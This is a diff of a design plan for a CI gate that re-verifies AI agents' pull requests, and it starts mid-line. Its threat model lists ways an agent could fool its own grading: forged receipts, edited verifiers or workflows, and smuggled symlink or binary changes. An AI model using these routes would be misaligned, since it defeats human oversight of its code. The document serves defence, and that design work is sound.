recomputes from base SHA by - running its own replay. Real failing/out-of-scope change -> BLOCKED. -2. **Tampered verifier / test / package scripts** -> diff touches verifier or a - protect path -> `HUMAN_APPROVAL_REQUIRED`; replay always uses base-SHA verifier - and base-SHA package scripts/lockfile. +1. **Forged receipt or forged evidence.json** -> adjudicator ignores all agent facts + (advisory only); recomputes from base SHA by running its own replay. +2. **Tampered verifier / test / package scripts / manifest / lockfile** -> diff + touches verifier, dependency files, or a protect path -> `HUMAN_APPROVAL_REQUIRED`; + replay always uses base-SHA verifier + base-SHA dependencies. 3. **Tampered policy / workflow / action** -> diff touches policy, - `.github/workflows/**`, or the action config -> `HUMAN_APPROVAL_REQUIRED`. -4. **Out-of-scope edit** -> Job B's own diff/scope check -> BLOCKED. + `.github/workflows/**`, or action config -> `HUMAN_APPROVAL_REQUIRED`. +4. **Out-of-scope edit** -> adjudicator's own diff/scope check -> BLOCKED. 5. **Green depends on uncommitted local state** -> clean replay at base+allowed diff fails to reproduce -> BLOCKED. -6. **Baseline already passing** -> Job B runs base-SHA verifier at base first; if - it already passes, STRONG is impossible (WEAK at best). -7. **Exfiltration / supply-chain via the verify step** -> neither job has secrets, - deployment creds, or `id-token`. Both are GitHub-hosted (req. below). Nothing to - steal, nothing to sign with. -8. **Artifact-channel poisoning** (agent overwrites/injects Job A's artifact) -> - irrelevant to the verdict: Job B never grades on Job A's artifact. A poisoned - artifact at most corrupts the untrusted-telemetry display, which is labelled - untrusted. The verdict is Job B's replay regardless. -9. **SHA confusion** (artifact/receipt carries a `base_sha`/`head_sha` to redirect - replay identity) -> Job B takes base/head only from the trusted PR event; - `GITHUB_SHA`/merge SHA is diagnostic only; a SHA from any artifact/receipt is - ignored. If trusted PR identity cannot be resolved -> BLOCKED. -10. **Diff-application smuggling** (symlink, file-mode/exec-bit flip, submodule - pointer, binary/`GIT_BINARY_PATCH`) used to apply something other than a plain - in-scope text blob -> Job B's diff applier rejects non-regular-file changes, - mode changes, submodule changes, and binary patches in the allowed set -> - BLOCKED (or HUMAN_APPROVAL_REQUIRED if it coincides with a protect/gated path). +6. **Baseline already passing** -> adjudicator runs base-SHA verifier at base first; + if it already passes, STRONG is impossible (WEAK at best). +7. **Credential theft via the verify step** -> neither the gate nor any side job has + secrets, OIDC/`id-token`, or deployment credentials, which limits credential + theft. **This is not network isolation.** See the corrected exfiltration note + below. +8. **Side-job / artifact poisoning** -> irrelevant to the verdict: the gate has no + `needs:` on any untrusted job and never grades on an artifact. A poisoned artifact + at most corrupts an advisory display, which is labelled untrusted. +9. **SHA confusion** (artifact/receipt carries a `base_sha`/`head_sha`) -> adjudicator + takes base/head only from the trusted PR event; `GITHUB_SHA`/merge SHA diagnostic + only; a SHA from any artifact/receipt is ignored. Unresolved identity -> BLOCKED. +10. **Diff-application smuggling** (delete/rename/copy/type-change, symlink, mode/ + exec-bit, submodule pointer, binary patch, LFS pointer) -> the applier accepts + only `A`/`M` regular UTF-8 text files in allow scope; everything else -> BLOCKED + (or HUMAN_APPROVAL_REQUIRED if it coincides with a protect/gated path). +11. **Stale base / stale approval** (evidence produced against an old base, or a + review left valid after later trust-path commits) -> hardened profile requires + branch-up-to-date-before-merge and stale-approval dismissal (sections below). + +### Inherited CI risks, explicitly OUT of scope for Tier 3 +Removing secrets/OIDC/deploy creds limits credential theft but does **not** provide +network isolation and does **not** prevent source-code exfiltration. Candidate code +run under the base-pinned verifier may still read available repository content, make +network calls, consume runner time, or attempt upload. These are inherited CI risks, +out of scope for Tier 3, and partially mitigated only by a hard job `timeout-minutes`. ### Out of scope (named, deferred on purpose) -- Cryptographic signing / keyless attestation (Sigstore/OIDC) of the verdict. - Reason: it requires giving a job a signing identity, and we refuse to put any - signing capability in a job that runs PR-candidate code. Tier 3 trust = a - **protected GitHub workflow + required status check + CODEOWNERS** (CI-attested, - not crypto-attested - see prerequisite section). Signing gets its own threat - model next. +- Cryptographic signing / keyless attestation (own threat model, next). +- Network isolation / egress control on the runner. - Hardware/second-OS sandbox beyond the GitHub-hosted runner. +- Merge queue (`merge_group`) support - unsupported in v1; see base-freshness. - Monorepo path-mapping nuance (single-package repo assumed for v1). +- "Independent budget enforcement" - NOT claimed in v1 (see budget section). --- -## How does the evidence verdict become an unspoofable required PR check? +## How does the verdict become a protected CI-attested required check? A CI job that recomputes the verdict honestly is **not enough on its own**. If the -PR can edit the workflow that runs Job B, or swap the policy/verifier that Job B -pins to, then "Job B is independent" is false - the agent rewrites the judge. So -Tier 3's trust rests on a **repository-hardening prerequisite** that the product -must state plainly and verify, not assume: +PR can edit the workflow that runs the adjudicator, or swap the policy/verifier it +pins to, then "the adjudicator is independent" is false - the agent rewrites the +judge. So Tier 3's trust rests on a **repository-hardening prerequisite** that the +product must state plainly and verify, not assume. We do **not** use the word +"unspoofable"; the honest claim is "protected, CI-attested required check." -**v1 trust prerequisite (required, not optional):** +**v1 trust prerequisite (the "hardened profile", required - not optional):** 1. **Protected default branch** - no direct pushes; merges only via PR that passes the required check. 2. **The Runcap check is marked Required** on the protected branch. -3. **CODEOWNERS ownership** of the trust surface, with required review from a human - code owner for any change to: - - `.github/workflows/**` (the workflow that runs Job A/Job B), - - `.runcap/mission.yaml|yml|json` (the policy), - - the verify command's own files, - - every `verification.protect` path. -4. **Action pinned by commit SHA** in the consumer workflow (provenance records the +3. **Branch must be up to date before merge** (base-freshness; see section). +4. **Dismiss stale approvals on new commits** OR require approval of the most recent + reviewable push (stale-approval protection; see section). +5. **CODEOWNERS ownership** of the trust surface, with required human code-owner + review for any change to: `.github/workflows/**`, `.runcap/mission.yaml|yml|json`, + the verify command's files, the dependency manifest/lockfile, and every + `verification.protect` path. +6. **No bypass** - "do not allow bypassing the above settings" is enabled, so the + protections apply even to admins/maintainers. The guarantee applies only against + PR authors without bypass authority. +7. **Action pinned by commit SHA** in the consumer workflow (provenance records the resolved SHA; `@v1` is for humans). -Without this, an agent's PR can change the rules in the same PR whose rules are -being graded. The CODEOWNERS + protected-branch combination is what makes -HUMAN_APPROVAL_REQUIRED meaningful: the gated change physically cannot merge until a -human code owner approves it. - -**Honesty rule for the product copy and the runner:** Runcap must NOT claim "the -runner is fully independent" in the absence of this hardening. At install time the -tool checks for the prerequisite and, if it is missing, reports -`INSTALLATION_NOT_HARDENED` (acceptance test below) rather than implying a -guarantee it cannot make. Detection is best-effort over what the GitHub API exposes -to a `contents: read` / `pull-requests: read` token (branch protection + required -checks where readable, presence of a CODEOWNERS file covering the trust paths); it -reports `INSTALLATION_NOT_HARDENED` when it cannot positively confirm the -prerequisite, and never reports "hardened" by assumption. +### Hardening: configuration vs detection (kept separate) +- **Configuration** is what the repo owner sets up (the 7 items above). It is the + thing that actually provides the guarantee. +- **Detection** is the adjudicator's best-effort attempt to *confirm* configuration + from a low-privilege (`contents: read`) PR job. A low-privilege job may not + reliably read all branch-protection / ruleset settings. Therefore detection is + allowed to return only: + - `HARDENED` - positively confirmed, OR + - `HARDENING_UNVERIFIED` - could not positively confirm (treated as a non-PASS, + same family as `INSTALLATION_NOT_HARDENED`). + Detection **never infers `HARDENED` by assumption** and never downgrades a missing + signal to a pass. Absence of proof of hardening is reported, not ignored. --- -## Architecture: two GitHub-hosted jobs, verdict computed only by Job B's replay +## Architecture: one required adjudicator job (Job B). No required executor. ``` PR opened/updated (on: pull_request <-- NOT pull_request_target) | v -[Job A: execute - TELEMETRY ONLY] GitHub-hosted; NO secrets, NO id-token, contents:read - - checkout base SHA (persist-credentials:false) - - run candidate code as the agent's env would - - emit telemetry.json: { agent_reported_exit, cost, models, calls } - (trust: untrusted, grades_verdict: false - NOTHING here grades) - | (artifact = UNTRUSTED, display-only) - v -[Job B: adjudicate - GitHub-hosted only, NO secrets/id-token/deploy creds] - needs: Job A (only to attach its telemetry to the report) +[Adjudicator - the ONE required job; GitHub-hosted; permissions: contents:read only] - read base.sha / head.sha from the trusted GitHub PR event (NOT GITHUB_SHA, NOT any artifact/receipt SHA); if unresolved -> BLOCKED - - read policy + verifier + protected + package scripts/lockfile @ base SHA - (git show base:path) + - resolve hardening: HARDENED | HARDENING_UNVERIFIED | INSTALLATION_NOT_HARDENED + (strict mode: any non-HARDENED -> non-zero, no merge-eligibility claim) + - read policy + verifier + dependency manifest/lockfile + pkg-manager cmd + + protected list @ base SHA (git show base:path) - compute diff base..head itself - - GATE: diff touches policy/workflow/verifier/protected/action - -> HUMAN_APPROVAL_REQUIRED + - GATE: diff touches policy/workflow/verifier/dependency files/protected/action + -> HUMAN_APPROVAL_REQUIRED (success/neutral; human code owner gates merge) - compute scope (allow/protect) itself - - apply ONLY plain in-scope text blobs into a clean base worktree; reject - symlink / mode-change / submodule / binary-patch smuggling -> BLOCKED + - apply ONLY A/M regular UTF-8 text blobs in allow scope; reject + D/R/C/T, symlink, mode change, submodule, binary, LFS -> BLOCKED + - install base-pinned deps with NO PR-controlled scripts/config + (documented: `npm ci --ignore-scripts`, base lockfile, no shared priv cache) - RUN the base-pinned verifier itself: baseline (pre-change) + replay (post-change). THIS is the only thing that grades. - - derive integrity_status from Job B's own two runs - - evaluatePolicyVerdict over B's recomputed facts (NOT artifact/receipt) - - print verdict: two sections (code evidence: recomputed | agent telemetry: untrusted) - - write PR check + $GITHUB_STEP_SUMMARY + provenance - - exit non-zero on BLOCKED / HUMAN_APPROVAL_REQUIRED -> required check fails PR + - derive integrity_status from its own two runs + - evaluatePolicyVerdict over recomputed facts (NOT artifact/receipt) + - write verdict via Actions check conclusion + $GITHUB_STEP_SUMMARY + (NO PR comments in v1) + - exit: PASS/HUMAN_APPROVAL_REQUIRED -> success/neutral; + BLOCKED / strict non-HARDENED -> non-zero -> required check fails PR + +[OPTIONAL advisory executor - NOT in the required path, NO `needs:` edge] + - may run candidate code in the agent's manner to capture cost/telemetry + - emits display-only data; if it crashes/skips, the gate is unaffected + - can be added later; absent in v1's minimal required workflow ``` -Why both jobs are GitHub-hosted with no privilege: Job A runs untrusted candidate -code, so it is stripped of all authority and secrets. Job B *also* runs candidate -code (under base-pinned inputs), so it too must be GitHub-hosted only - **no -self-hosted runner, no secrets, no `id-token`, no deployment credentials, no shared -privileged cache** that a prior PR could have poisoned. The only authority Job B -holds is posting a status, granted by the protected-workflow + required-check -prerequisite, not by a secret. In v1 there is **no signing secret in either job**. +Why one job, no `needs:` on an executor: an earlier draft kept a powerless executor +(Job A) and had the adjudicator `needs:` it. That is wrong for a Required Proof Gate: +if untrusted candidate code makes the executor fail or skip, a dependent adjudicator +can be skipped too, and a skipped required check can be misconfigured into "passing." +So the gate stands alone. Telemetry, if collected at all, is a separate optional job +with no edge into the gate. --- @@ -243,98 +241,111 @@ prerequisite, not by a secret. In v1 there is **no signing secret in either job* - **`GITHUB_SHA` / the merge commit SHA** = diagnostic/provenance only; never used to select replay identity. - **No SHA from an artifact or receipt** can influence replay identity. A - `base_sha`/`head_sha` appearing in `evidence.json`/`receipt.json` is ignored. -- **If trusted PR identity is unresolved** (event payload missing/ambiguous, e.g. - the workflow was triggered in a context without a `pull_request` event) -> the + `base_sha`/`head_sha` in `evidence.json`/`receipt.json` is ignored. +- **If trusted PR identity is unresolved** (event payload missing/ambiguous) -> the verdict is **BLOCKED** (fail closed). Replay never runs against an unverified identity. -- **diff** = `git diff --name-status ..`, computed by Job B. - Never taken from `receipt.changedFiles` or from Job A. -- **policy / verifier / protected / package scripts + lockfile** = `git show - :`. Never from the post-head working tree. -- **action commit** = consumer workflow pins the Runcap action by **commit SHA**; - Job B records the resolved SHA in provenance. -- **applied changes** = for each `base..head` path matching `allow` AND not - matching `protect` AND not a gated path AND that is a plain regular-file text - change (no symlink, no mode change, no submodule, no binary patch), the **head** - blob is applied into the clean base worktree. Anything else -> BLOCKED. +- **diff** = `git diff --name-status ..`, computed by the + adjudicator. Never from `receipt.changedFiles` or any artifact. +- **policy / verifier / protected / dependency manifest+lockfile / pkg-manager cmd** + = `git show :`. Never from the post-head working tree. +- **action commit** = consumer workflow pins the action by **commit SHA**; recorded + in provenance. +- **applied changes** = for each `base..head` path that is `A` or `M`, matches + `allow`, is not `protect`/gated, and is a plain regular-file UTF-8 text change, the + **head** blob is applied into the clean base worktree. Anything else -> BLOCKED. + +### Base-freshness (v1 decision, documented) +Evidence must not be produced against an old base and then merged against a newer +base. v1 choice: **strict branch protection requires the branch to be up to date +before merge.** **Merge queue is unsupported in v1.** Future note: if merge-queue +support is added, the workflow must also trigger on `merge_group` and re-run the +adjudicator against the queued base. + +### Stale-approval protection (hardened profile) +A safe-workflow review must not stay valid after later trust-path changes. The +hardened profile requires one of: **dismiss stale approvals when new commits are +pushed**, OR **require approval of the most recent reviewable push.** --- -## HUMAN_APPROVAL_REQUIRED (third verdict state) - exact lifecycle - -`evaluatePolicyVerdict` today returns `PASS | BLOCKED`. Tier 3 adds -`HUMAN_APPROVAL_REQUIRED`, emitted by Job B's gate when the diff touches: -`.runcap/mission.yaml|yml|json`, `.github/workflows/**`, the verify command's own -files, or any `verification.protect` path. - -- **Does it block?** Yes. It is a non-PASS state; the required check exits non-zero, - so the PR cannot auto-merge. Distinct from BLOCKED ("ran and failed the rules") - in meaning and message, but identical in merge effect: not mergeable as-is. -- **Who approves?** A human **code owner** of the touched trust path (via the - CODEOWNERS prerequisite). Approval is a GitHub PR review approval from that code - owner - i.e. it happens in GitHub's protected-branch machinery, not inside - Runcap. Runcap does not grant the approval; it only refuses to auto-grade. -- **How does a legitimate policy/verifier update eventually pass?** The code owner - reviews and approves the PR in GitHub. On a protected branch configured so that - the required code-owner review + the required check together gate merge, the - approved PR becomes mergeable: the **new** policy/verifier is now the base for all - *subsequent* PRs, which Job B will pin to going forward. The gated PR itself - merges on human authority (the rules cannot grade their own change); every PR - after it is auto-graded against the now-updated, human-approved base. This is the - intended escape hatch: rules evolve, but only through a human code owner, never - through the agent that benefits from the change. - -Required check fails the PR for both non-PASS states. +## The four verdict states - exact exit semantics + +| State | Meaning | Action conclusion | Merge effect | +|---|---|---|---| +| `PASS` | Adjudicator's replay reproduced the verified result under base-pinned rules. | success | Mergeable (with other required gates). | +| `BLOCKED` | Replay failed, scope violation, rejected diff type, unresolved identity, etc. | **failure (non-zero)** | Cannot merge until **code** changes. | +| `HUMAN_APPROVAL_REQUIRED` | Diff changes the rules (policy/workflow/verifier/deps/protected). Runcap refuses to issue automated code proof. | **success / neutral (NOT failure)** | Held by CODEOWNERS + protected branch until an authorized human approves; merges on **human** authority. | +| `INSTALLATION_NOT_HARDENED` (and `HARDENING_UNVERIFIED`) | Hardened-profile prerequisite is missing or cannot be positively confirmed. | **strict mode: failure (non-zero)** | No merge-eligibility claim; never rendered as PASS. | + +### HUMAN_APPROVAL_REQUIRED lifecycle (the previous contradiction, fixed) +Earlier the plan said this state exits non-zero AND that a CODEOWNER approval lets +the same PR merge - contradictory, because a failed required check stays failed +regardless of review approval. Corrected semantics: + +- The adjudicator returns **success/neutral**, not failure. It does not block by + failing the check; it explicitly **declines to auto-grade** a rules change. +- The job summary states plainly that **human authority (CODEOWNER review) is + required** and names the gated trust path. It must NOT imply Runcap itself grants + approval. +- The PR is held not by a red Runcap check but by the **protected branch + + CODEOWNERS** machinery: the required human code-owner review is the gate. +- When the authorized human approves and the PR merges, the **new** human-approved + policy/verifier/deps become the base for **subsequent** PRs, which the adjudicator + pins to and auto-grades going forward. Rules evolve only through a human code + owner, never through the agent that benefits. + +### INSTALLATION_NOT_HARDENED - fail closed +Default (strict Proof Gate) mode: a non-HARDENED result (`INSTALLATION_NOT_HARDENED` +or `HARDENING_UNVERIFIED`) exits non-zero and makes **no** merge-eligibility claim. +**PASS-plus-warning is not allowed by default.** + +An optional future advisory mode (`runcap ci --advisory`) may run the replay without +the hardened prerequisite, but it must output something like: +``` +ADVISORY_REPLAY_PASSED +Hardening: unverified +Not a Proof Gate verdict +``` +It must **never** be called PASS. --- ## Inputs / outputs (contracts) -### Job A output: `telemetry.json` (NO verdict, NO trusted facts) -```jsonc -{ - "schema": "runcap.ci-telemetry/v1", - "trust": "untrusted", - "grades_verdict": false, - "agent_reported_baseline_exit": 1, // DISPLAY ONLY - never grades - "agent_reported_replay_exit": 0, // DISPLAY ONLY - never grades - "observed_cost_usd": 0.0007, - "models": ["gpt-4o"], - "llm_calls": 3 -} -``` -Hard rule: Job A computes no integrity status, no scope, no verdict. Every field is -display-only. If Job A emits a `verdict`/`status`/`integrity_status` field, Job B -ignores it. Deleting Job A entirely would not change any verdict. - -### Job B output: the verdict (two visibly separated evidence sources, req. 6) +### Verdict output (the adjudicator; two visibly separated sources, req. 6) ```jsonc { "schema": "runcap.ci-verdict/v1", - "verdict": "PASS|BLOCKED|HUMAN_APPROVAL_REQUIRED", + "verdict": "PASS|BLOCKED|HUMAN_APPROVAL_REQUIRED|INSTALLATION_NOT_HARDENED", + "mode": "proof_gate_strict", // or "advisory" (never emits PASS) "reasons": [ "..." ], - "truth": "calculated_in_ci_from_base_sha_inputs_by_job_b_replay", + "truth": "calculated_in_ci_from_base_sha_inputs_by_adjudicator_replay", "code_evidence": { // recomputed by CI - the ONLY thing that grades "source": "recomputed_by_ci_from_base_sha", "grades_verdict": true, "integrity_status": "VERIFIED_STRONG|VERIFIED_WEAK|UNVERIFIED|VERIFIER_COMPROMISED", "baseline_passed": false, "replay_passed": true, - "scope_violations": [], "gate": { "triggered": false, "reason": null }, - "diff_application": "ok" // or "rejected: symlink|mode|submodule|binary" + "scope_violations": [], + "gate": { "triggered": false, "reason": null }, + "diff_application": "ok", // or "rejected: D|R|C|T|symlink|mode|submodule|binary|lfs" + "deps": { "source": "base_sha", "install": "npm ci --ignore-scripts" } }, - "agent_telemetry": { // untrusted - display only - "source": "agent_environment_and_job_a", + "agent_telemetry": { // untrusted, advisory, OPTIONAL - display only + "source": "agent_environment_optional_advisory_job", "trust": "untrusted", "grades_verdict": false, - "agent_claimed_status": "VERIFIED_STRONG", // shown, never trusted + "available": true, // false when telemetry missing/corrupt/skipped + "agent_claimed_status": "VERIFIED_STRONG", "agent_reported_exits": { "baseline": 1, "replay": 0 }, "observed_cost_usd": 0.0007, "models": ["gpt-4o"], "llm_calls": 3 }, - "hardening": { // the prerequisite check (req. / section above) - "status": "HARDENED|INSTALLATION_NOT_HARDENED", - "protected_branch": true, "required_check": true, - "codeowners_covers_trust_paths": true, "action_pinned_by_sha": true + "hardening": { + "status": "HARDENED|HARDENING_UNVERIFIED|INSTALLATION_NOT_HARDENED", + "detected": { "protected_branch": true, "required_check": true, + "up_to_date_before_merge": true, "stale_approval_dismissal": true, + "codeowners_covers_trust_paths": true, "no_bypass": true, + "action_pinned_by_sha": true } }, "provenance": { "base_sha": "...", "head_sha": "...", "policy_hash": "...", @@ -343,120 +354,152 @@ ignores it. Deleting Job A entirely would not change any verdict. } } ``` -`agent_telemetry.grades_verdict` is permanently `false`: cost and the agent's -claimed status/exits are retained and displayed but can never move the gate. (Budget -*limits* are still enforced at run time by the gateway 429 and recorded; but the CI -verdict's integrity does not depend on any agent-reported number or exit code.) +`agent_telemetry.grades_verdict` is permanently `false`. When telemetry is missing, +corrupt, unavailable or skipped, `available:false` and the verdict is unaffected. -### Permissions (the load-bearing posture) +### Permissions (the load-bearing posture - minimal) ```yaml -on: pull_request # req. 3 - NOT pull_request_target +on: pull_request # req. 4 - NOT pull_request_target permissions: - contents: read # read-only - pull-requests: write # Job B only, to post the check/summary - id-token: none # NO OIDC / no signing capability (both jobs) -# GitHub-hosted runners only (both jobs); no self-hosted runner; -# no secrets exposed to either job; no deployment creds; no shared privileged cache + contents: read # ONLY this +# Explicitly NOT present: pull-requests:write, checks:write, issues:write, +# id-token, secrets, deployment credentials. +# GitHub-hosted runners only; no self-hosted runner; no cache shared with +# privileged workflows. +jobs: + proof-gate: + runs-on: ubuntu-latest # GitHub-hosted only (no self-hosted) + timeout-minutes: 10 # hard cap on runner time (inherited-CI mitigation) ``` +No PR comments in v1: the verdict surfaces only via the Actions **check conclusion** +and `$GITHUB_STEP_SUMMARY`. (`contents: read` is sufficient for the check +conclusion; we deliberately do not request `checks: write` or `pull-requests: write`.) + +### Dependency-install contract (base-pinned, no PR-controlled execution) +- Package-manager command comes from the **base** revision. +- Package manifest + lockfile come from the **base** revision. +- **No `npm install`; no floating tags; no arbitrary `npx` download.** +- **No PR-controlled `.npmrc`, package scripts, config, or lifecycle hooks.** +- v1 mandates **`npm ci --ignore-scripts`** (lifecycle/install scripts disabled). +- **No cache shared with privileged workflows.** + +--- + +## Budget evidence (honest scope) + +Tier 3 independently proves **code evidence only**: frozen policy, scope, baseline, +clean replay, CI verdict. Agent-side telemetry remains advisory: model, local +gateway cost, call count, agent-reported cap status. Until there is a trusted +gateway / central ledger, **no agent-side spend field may affect the Proof Gate +verdict**, and we must **not** claim "independent budget enforcement." The hard +spend cap is still enforced locally at run time by the gateway 429; that is a +local-run guarantee, not a CI-attested one. --- ## Acceptance tests (all must pass before Tier 3 ships) -Extend the existing `check(name, pass)` style. CI logic is exercised by driving -the future `runcap ci --mode execute` (Job A telemetry) and `--mode adjudicate` -(Job B verdict) against fixtures in temp git repos with a real base/head. - -1. **Forged receipt is ignored.** Head workspace has a hand-written `receipt.json` - = VERIFIED_STRONG/verified, but the diff does not fix the failing task. -> Job B - recomputes via its own replay -> UNVERIFIED -> **BLOCKED**; the receipt's claimed - status appears only under `agent_telemetry`, never in the grading path. -2. **Forged Job-A artifact is ignored (req. 7, the headline test).** Feed Job B a - malicious `telemetry.json` claiming `agent_reported_replay_exit: 0` and a - `status: "VERIFIED_STRONG"` field, while the real replay fails. -> Job B's own - replay decides -> **BLOCKED**; assert the forged values appear only under - `agent_telemetry` and never in `code_evidence` or `reasons`. -3. **Verifier change -> human gate.** Diff edits the verify file / a `protect` - path -> `HUMAN_APPROVAL_REQUIRED`, reason names the path; required check fails. -4. **Policy change -> human gate.** Diff edits `.runcap/mission.yaml` - -> `HUMAN_APPROVAL_REQUIRED`. -5. **Workflow change -> human gate.** Diff edits `.github/workflows/*.yml` +Extend the existing `check(name, pass)` style, driving the future +`runcap ci --mode adjudicate` against fixtures in temp git repos with a real +base/head. + +1. **Forged receipt is ignored.** Hand-written `receipt.json` = VERIFIED_STRONG, but + the diff does not fix the failing task -> adjudicator's replay -> UNVERIFIED -> + **BLOCKED**; claimed status appears only under `agent_telemetry`. +2. **Forged advisory artifact is ignored (headline).** Malicious telemetry claiming + `replay_exit:0` + `status:VERIFIED_STRONG` while the real replay fails -> **BLOCKED**; + forged values appear only under `agent_telemetry`, never in `code_evidence`/`reasons`. +3. **Gate runs without telemetry (req. 1/2).** Optional telemetry is missing, + corrupt, unavailable, or intentionally skipped -> adjudicator still runs and + reports a verdict; `agent_telemetry.available:false`; verdict unchanged. +4. **Verifier change -> human gate.** Diff edits the verify file / a `protect` path -> `HUMAN_APPROVAL_REQUIRED`. -6. **Honest allowed diff -> PASS.** Diff entirely within `allow`; baseline verify - fails (real task); Job B's replay passes from base+allowed diff -> `VERIFIED_STRONG` - -> **PASS**. -7. **Out-of-scope diff -> BLOCKED.** Diff includes a path outside `allow` (not a - gated path) -> scope_violations non-empty -> **BLOCKED**. -8. **Baseline already passes -> no strong proof.** Verifier passes at base SHA - before any change -> integrity capped at `VERIFIED_WEAK`; STRONG impossible. -9. **Replay fails in clean CI -> BLOCKED.** Pass existed only in the agent's dirty - tree; clean base+allowed-diff replay fails -> **BLOCKED**. -10. **Cost/exit telemetry retained, cannot grade (req. 6).** Receipt/telemetry - carries a cost/model/exit block; assert it appears under `agent_telemetry` with - `grades_verdict:false`, and that mutating it (cost -> $0, cost -> $9999, or - flipping `agent_reported_replay_exit`) does NOT change the verdict for any - fixture above. -11. **Verdict shows both sources separately (req. 6).** Assert the rendered verdict - contains a "Code evidence: recomputed by CI" section and an "Agent-side - telemetry: untrusted" section, distinctly labelled. -12. **Provenance recorded (req. 2).** Verdict JSON has base_sha, head_sha, - policy_hash, action_sha, workflow_run_id, job_id; `truth` = - `calculated_in_ci_from_base_sha_inputs_by_job_b_replay`; `github_sha_diagnostic` - present but unused for replay identity. -13. **No-authority posture (static check, req. 3 + both-jobs safety).** A lint/test - asserts the shipped workflow template uses `pull_request` (not - `pull_request_target`), sets `id-token` absent/none, exposes no `secrets:` to - either job, and uses GitHub-hosted runners only (no `runs-on: self-hosted`). -14. **SHA cannot be redirected by artifact/receipt (req. / base-head section).** - Feed Job B a `receipt.json`/`telemetry.json` carrying a different - `base_sha`/`head_sha`; assert replay uses the PR-event SHAs and the artifact - SHAs are ignored. Separately: simulate an unresolved PR identity (no - `pull_request` event payload) -> **BLOCKED** (fail closed). -15. **Diff-smuggling rejected.** Four sub-fixtures, each an in-`allow` path that is - NOT a plain text blob: (a) a symlink, (b) an exec-bit/mode change, (c) a - submodule pointer change, (d) a binary patch. Each -> Job B's applier rejects it - -> **BLOCKED** with `code_evidence.diff_application` naming the reason. -16. **Un-hardened installation is reported, not silently trusted.** Run the adjudicator - against a repo whose branch protection / required check / CODEOWNERS prerequisite - is absent -> verdict carries `hardening.status: "INSTALLATION_NOT_HARDENED"`, and - the tool does NOT print any "fully independent / unspoofable" guarantee. (Whether - this also forces a non-PASS is a product decision flagged for Kirill in the PR; - default proposal: surface it loudly as a warning on PASS, and document that the - guarantee holds only when `HARDENED`.) -17. **HUMAN_APPROVAL_REQUIRED lifecycle.** A gated-path diff -> verdict - `HUMAN_APPROVAL_REQUIRED`, required check non-zero (does not auto-merge); the - reason explains a human code owner must approve; assert the message names the - gated path and does NOT imply Runcap itself can grant approval. +5. **Policy change -> human gate.** Diff edits `.runcap/mission.yaml` -> + `HUMAN_APPROVAL_REQUIRED`. +6. **Workflow change -> human gate.** Diff edits `.github/workflows/*.yml` -> + `HUMAN_APPROVAL_REQUIRED`. +7. **Dependency change -> human gate.** Diff edits `package.json`/lockfile -> + `HUMAN_APPROVAL_REQUIRED`. +8. **HUMAN_APPROVAL_REQUIRED returns success/neutral (NOT failure).** Assert the + Action conclusion is success/neutral, the summary says a human CODEOWNER review is + required and names the gated path, and it does NOT imply Runcap grants approval. +9. **Honest allowed diff -> PASS.** Diff entirely within `allow`; baseline fails; + adjudicator's replay passes -> `VERIFIED_STRONG` -> **PASS**. +10. **Out-of-scope diff -> BLOCKED.** Path outside `allow` (not gated) -> + scope_violations non-empty -> **BLOCKED**. +11. **Baseline already passes -> no strong proof.** Verifier passes at base SHA + before any change -> capped at `VERIFIED_WEAK`; STRONG impossible. +12. **Replay fails in clean CI -> BLOCKED.** Pass existed only in the agent's dirty + tree; clean base+allowed-diff replay fails -> **BLOCKED**. +13. **Cost/exit telemetry cannot grade.** Mutating cost (-> $0, -> $9999) or flipping + a reported exit does NOT change the verdict for any fixture; agent-claimed + budget-cap status cannot affect the proof verdict. +14. **Two sources shown separately.** Rendered verdict has a "Code evidence: + recomputed by CI" section and an "Agent-side telemetry: untrusted, advisory" + section, distinctly labelled. +15. **Provenance recorded.** Verdict has base_sha, head_sha, policy_hash, action_sha, + workflow_run_id, job_id; `truth` = `..._by_adjudicator_replay`; + `github_sha_diagnostic` present but unused for replay identity. +16. **SHA cannot be redirected by artifact/receipt.** Feed a receipt/telemetry with a + different base/head SHA -> replay uses PR-event SHAs; artifact SHAs ignored. + Separately: unresolved PR identity -> **BLOCKED** (fail closed). +17. **Old-base evidence rejected / branch must be up to date.** Assert the hardened + profile requires branch-up-to-date-before-merge; evidence produced against a + superseded base is not merge-eligible. (Merge queue unsupported in v1.) +18. **Diff-smuggling rejected (one sub-fixture each).** `D` delete, `R` rename, `C` + copy, `T` type-change, symlink, mode/exec-bit change, submodule pointer, binary + patch, LFS pointer change -> each rejected -> **BLOCKED** with + `code_evidence.diff_application` naming the reason. Only `A`/`M` regular UTF-8 + text files in allow scope are accepted. +19. **No privileged permissions in the reference workflow (static check).** Asserts + `pull_request` (not `pull_request_target`); `permissions: contents: read` only + (no `pull-requests`/`checks`/`issues`/`id-token`); no `secrets:` exposed; GitHub- + hosted runner only (no `runs-on: self-hosted`); a `timeout-minutes` is present. +20. **Dependency install cannot execute PR-controlled scripts/config.** Install uses + base manifest/lockfile + base pkg-manager cmd with `--ignore-scripts`; a + PR-added lifecycle script / `.npmrc` / config is NOT executed. +21. **Network activity is not claimed to be prevented.** A doc/test assertion: the + rendered verdict and docs do NOT claim network isolation or exfiltration + prevention; they state these are inherited CI risks, out of scope. +22. **Un-hardened / unverified install fails closed.** No branch protection / required + check / CODEOWNERS, OR detection cannot confirm them -> `INSTALLATION_NOT_HARDENED` + / `HARDENING_UNVERIFIED`; strict mode exits non-zero; never renders PASS. Advisory + mode emits `ADVISORY_REPLAY_PASSED` + `Hardening: unverified` + `Not a Proof Gate + verdict`, never PASS. --- ## What changes in code (for the LATER build step, NOT now) Listed so the plan is actionable; not to be implemented until approved: -- `evaluatePolicyVerdict`: add `HUMAN_APPROVAL_REQUIRED`; grade off a passed-in - **CI-recomputed evidence** object built from Job B's own replay, never the agent - receipt or Job A artifact fields. Keep the receipt path only for the local +- `evaluatePolicyVerdict`: add `HUMAN_APPROVAL_REQUIRED` and `INSTALLATION_NOT_HARDENED`; + grade off a passed-in **CI-recomputed evidence** object built from the adjudicator's + own replay, never the agent receipt. Keep the receipt path only for the local `mission run` developer loop, clearly labelled "local, advisory." -- New CI evidence builder (Job B core): port `freezeTaskContract` + - `checkVerificationIntegrity` + `verifyInCleanWorktree` logic to source ALL - inputs from base SHA, compute the diff itself, reject diff-smuggling, and run the - baseline + replay itself. This is the heart of Tier 3. -- Diff applier with a hard allowlist of change kinds (regular-file text blobs only). -- Hardening detector: best-effort read of branch protection / required check / - CODEOWNERS coverage -> `HARDENED | INSTALLATION_NOT_HARDENED`. -- `runcap ci` gains `--mode execute` (Job A telemetry) and `--mode 